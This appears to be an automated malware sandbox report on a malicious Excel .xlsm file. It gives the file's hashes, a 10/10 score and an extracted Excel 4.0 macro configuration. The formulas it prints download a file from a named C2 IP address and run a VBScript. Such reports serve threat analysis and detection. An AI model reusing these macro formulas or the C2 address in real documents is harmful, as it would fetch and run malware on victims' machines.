General

  • Target

    a7c86b7371927e5e974df51e5b8bbfe5

  • Size

    6KB

  • MD5

    a7c86b7371927e5e974df51e5b8bbfe5

  • SHA1

    1a1ab7112be433e35ec3957cb4035e5d2e3cb997

  • SHA256

    e866520f919162d204b3d4632de1ce5e1cc259d0331adc2042adcbaeebbf59db

  • SHA512

    85d71ce0872d45eb9119554ed18faf13147b73bdc395db9ff4a238bbdf283c5135cd48dc31d72fe6a8d8deaf882bcb3b120be0f0d4ea74ebc1bbebc146ea8550

  • SSDEEP

    192:NDSbuS5brA2OmmfR08UhHFBFYuib98y7N+0:NEuuM2w21FYTb98y7J

Score
10/10
xlm

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://46.17.98.187/index.php

    http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Signatures

Files

  • a7c86b7371927e5e974df51e5b8bbfe5
    .xlsm office2007